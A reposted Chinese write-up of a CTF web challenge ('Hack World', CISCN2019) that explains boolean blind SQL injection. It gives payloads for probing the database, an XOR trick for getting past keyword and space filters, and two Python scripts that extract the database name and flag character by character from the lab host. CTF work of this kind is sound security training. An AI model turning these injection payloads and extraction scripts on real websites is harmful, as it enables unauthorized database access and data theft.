碼上快樂

相關內容    簡體    繁體

BUUCTF | [CISCN2019 華北賽區 Day2 Web1]Hack World

本文轉載自   查看原文   2019-10-25 19:57   664    BUU/ sql注入 
 
        
 
         
id=0
id=1
id=2
id=3

 
        
 
        
發現結果不一樣,嘗試 : ">4","=4","<4" : 
 
        
 
        
在自己的環境下驗證一下:
 
        
 
        
 爆一下數據庫:
 
        
 
         
id=(ascii(substr(database(),1,1))>32)
 
        
 
        
 
          
          
         
 
          
'''
@Modify Time      @Author
------------      -------
2019/10/25 19:28   laoalo
'''
import requests
from lxml import etree
def a():
    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"
    flag="Hello, glzjin wants a girlfriend."
    final=""
    stop=0
    for i in range(1,129):
         print("*"*50,i,"*"*50)
         stop=0
         for j in range(32,129):
             stop = j
             data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)}
             # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)}
             re = requests.post(url=url,data=data).text.replace('\n','')
             html = etree.HTML(re).xpath("//text()")
             print(">>",html)
             if flag in html:
                  final+=chr(j)
                  print("\n\t\t\t\t",final)
                  break

         if stop >= 128:
            print("*"*50,"結束")
            print(">>",final)
            break

if __name__ == '__main__':
       a()
 
         
 
         View Code 
        
 
        
 
        
過濾如何處理: 
 
        
在爆flag的時候發現有過濾 :select,show,""……很是難受,后來在師傅的博客上看到了這種方法:
 
        
 
         
id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
 
        
 
         
         
        
 
        
 
         
1^1=0 ,0^0=0 ,0^1=1
 
         
1^1^1=1, 1^1^0=0
構造payload:1^ascii(mid(database(),1,1)=98)^0
 
         
注意這里會多加一個^0或1是因為在盲注的時候可能出現了語法錯誤也無法判斷,而改變這里的0或1,如果返回的結果是不同的,那就可以證明語法是沒有問題的
 
        
 
        
其實不用抑或也行:
 
        
 
         
id=(ascii(substr((select(flag)from(flag)),1,1))<128)
 
        
 
        
 
        
 居然去掉空格就成功繞過了Orz,這個方法要學習一下,這里貼一下我的腳本,沒有用二分十分簡單的枚舉:
 
        
 
         
''' @Modify Time @Author ------------ ------- 2019/10/25 19:28 laoalo '''
import requests from lxml import etree def a(): url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/" flag="Hello, glzjin wants a girlfriend." final="" stop=0 for i in range(1,1290): print("*"*50,i,"*"*50) stop=0 for j in range(32,129): stop = j data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)} re = requests.post(url=url,data=data).text.replace('\n','') html = etree.HTML(re).xpath("//text()") # print(">>",html)
             if flag in html: final+=chr(j) print("\n\t\t\t\t",final) break

         if stop >= 128: print("*"*50,"結束") print(">>",final) break

if __name__ == '__main__': a()
 
        
 
         
         
        
 
        
 
 
        
 
        
參考資料:
 
        
SQL注入學習總結(八):其他SQL注入的異或注入:https://blog.csdn.net/weixin_30740295/article/details/96833688
 
        
 
         
buuctf-web-[CISCN2019 華北賽區 Day2 Web1]Hack World:https://blog.csdn.net/weixin_43345082/article/details/99062970 
 
        
 
       
 
        
       
 
        
 
 
       
 
        
       
 
       
 
      
 
      
 
      
 
     
 
     
 
      
 
      
 
        
       
免責聲明!
 
       
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
 
      
 
      

      
 
     
 
    
 
     
    
 
     
 
      猜您在找 
        [CISCN2019 華北賽區 Day2 Web1]Hack World  
        刷題記錄:[CISCN2019 華北賽區 Day2 Web1]Hack World  
        BUUCTF | [CISCN2019 華北賽區 Day1 Web1]Dropbox  
        [CISCN2019 總決賽 Day2 Web1]Easyweb  
        [CISCN2019 華北賽區 Day1 Web2]ikun  
        ciscn2019華北賽區半決賽day1web5CyberPunk  
        ciscn2019華北賽區半決賽day1_web1題解  
        ciscn-華北賽區-Day1-Web2題解  
        [CISCN2019 華東南賽區]Double Secret  
        ciscn2019華東南賽區double_secret題解  
      
 
      
 
     
 
    
 
   
 
  
 
  

    
  
 
  
 
   
 
   
 
   
 
    粵ICP備18138465號  
    © 2018-2025 CODEPRJ.COM